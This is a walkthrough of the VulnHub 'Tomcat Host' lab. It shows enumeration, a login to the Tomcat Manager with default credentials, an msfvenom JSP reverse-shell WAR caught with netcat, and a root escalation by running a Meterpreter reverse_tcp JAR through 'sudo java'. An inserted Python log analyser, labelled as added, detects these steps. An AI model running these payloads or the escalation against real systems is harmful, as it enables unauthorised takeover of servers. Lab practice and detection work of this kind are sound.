Tomcat Host

Welcome to “My Tomcat Host”. This boot to root VM is designed for testing your basic enumeration skills and concepts.

Url: Tomcat Host 1 VulnHub

Difficulty: Easy/Beginner Level

Author: Akanksha Sachin Verma


First, a netdiscover scan reveals the machine's address on the network:

netdiscover -i eth1


Then an nmap scan:

nmap -p- -A


A closer look at port 8080 in my browser reveals Apache Tomcat/9.0.31.


Apache Tomcat is an application server that executes Java servlets and renders web pages written with JavaServer Pages (JSP).

The “Manager App” section requires a username and password. Tomcat’s default credentials (tomcat:tomcat) work.

Because the Web Application Manager deploys and runs any WAR file it is given, it is an opportunity to upload a reverse shell. I’ll be using msfvenom to create the reverse shell. This is a good website on how to use msfvenom for reference:

Offensive Security

The payload must be a WAR file that connects back to port 4444 on my local address.

msfvenom -p java/jsp_shell_reverse_tcp lhost= lport=4444 -f war > fedai.war

This will be uploaded here:


Before executing the payload, listen on port 4444 with netcat:

nc -nvlp 4444

Now it must be executed, so we visit the path where it is deployed, in my case /fedai. We now have a reverse shell; the uid is ‘tomcat’. Upgrade it to an interactive TTY with:

python -c 'import pty;pty.spawn("/bin/bash")'
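From the defender’s side, the manager login, the WAR upload and the first hit on the new context all leave a trail in Tomcat’s access log. The following Python is added here and is not part of the original post: it parses constructed log lines in Tomcat’s default AccessLogValve “common” pattern and flags manager logins by well-known example account names, WAR deployments through the manager, and the first request to a context that did not exist before a deployment; the account list and the sample lines are assumptions.

```python
import re
from dataclasses import dataclass

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Assumed watch-list: example account names from Tomcat's shipped tomcat-users.xml
DEFAULT_ACCOUNTS = {"tomcat", "admin", "manager", "role1", "both"}
# Routes through which the Manager deploys a WAR (HTML manager upload, text manager deploy)
DEPLOY_ROUTES = {("POST", "/manager/html/upload"), ("PUT", "/manager/text/deploy")}

@dataclass
class Finding:
    kind: str
    host: str
    detail: str

def analyse(lines):
    """Flag default-account manager logins, WAR deployments, and the first
    request to a context that was never seen before a deployment."""
    findings, seen_contexts, deployed = [], set(), False
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not in the expected pattern; ignore
        host, user, method, status = m["host"], m["user"], m["method"], int(m["status"])
        path = m["path"].split("?", 1)[0]          # drop query string (CSRF nonce etc.)
        parts = path.split("/")
        context = "/" + parts[1] if len(parts) > 1 else path   # "/fedai/" -> "/fedai"
        if path.startswith("/manager"):
            if status == 200 and user in DEFAULT_ACCOUNTS:
                findings.append(Finding("default_account_manager_login", host, user))
            if (method, path) in DEPLOY_ROUTES and status < 400:
                findings.append(Finding("war_deployed", host, f"{method} {path}"))
                deployed = True
            continue
        if deployed and context not in seen_contexts:
            findings.append(Finding("new_context_after_deploy", host, context))
        seen_contexts.add(context)
    return findings

# Constructed sample log (not from the original post): a browser logs in as
# tomcat, uploads a WAR, then requests the freshly created context.
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2020:10:00:50 +0000] "GET /docs/ HTTP/1.1" 200 7112
10.0.0.5 - - [03/May/2020:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - tomcat [03/May/2020:10:01:10 +0000] "GET /manager/html HTTP/1.1" 200 16021
10.0.0.5 - tomcat [03/May/2020:10:02:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 303 -
10.0.0.5 - - [03/May/2020:10:02:40 +0000] "GET /docs/ HTTP/1.1" 200 7112
10.0.0.5 - - [03/May/2020:10:02:45 +0000] "GET /fedai/ HTTP/1.1" 200 0
""".splitlines()

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f.kind:30} {f.host:12} {f.detail}")
```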



Always check sudo privileges to see how we can start escalating privileges:

sudo -l

As shown, the user tomcat can run this binary with sudo: /usr/lib/jvm/java-1.8.0-openjdk- This is an OpenJDK java binary, which we can use to escalate privileges.

We’ll be creating another reverse shell payload, this time a Meterpreter payload in JAR format, connecting back to port 5555 on my local IP address. The file will be downloaded onto the victim’s machine, so it is created under the Apache web directory on my machine.

msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp lhost= lport=5555 > fedai.jar


Start the apache2 service:

service apache2 start

Go to the temp directory on the victim’s machine and transfer the payload over.

cd /tmp



Before executing it, set up the Meterpreter listener in Metasploit:

use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lport 5555


Let’s execute this payload with the following command:

sudo java -jar fedai.jar


We get a successful connection from the Tomcat machine, as seen in Meterpreter, and the current user is identified as root!


Written on May 3, 2020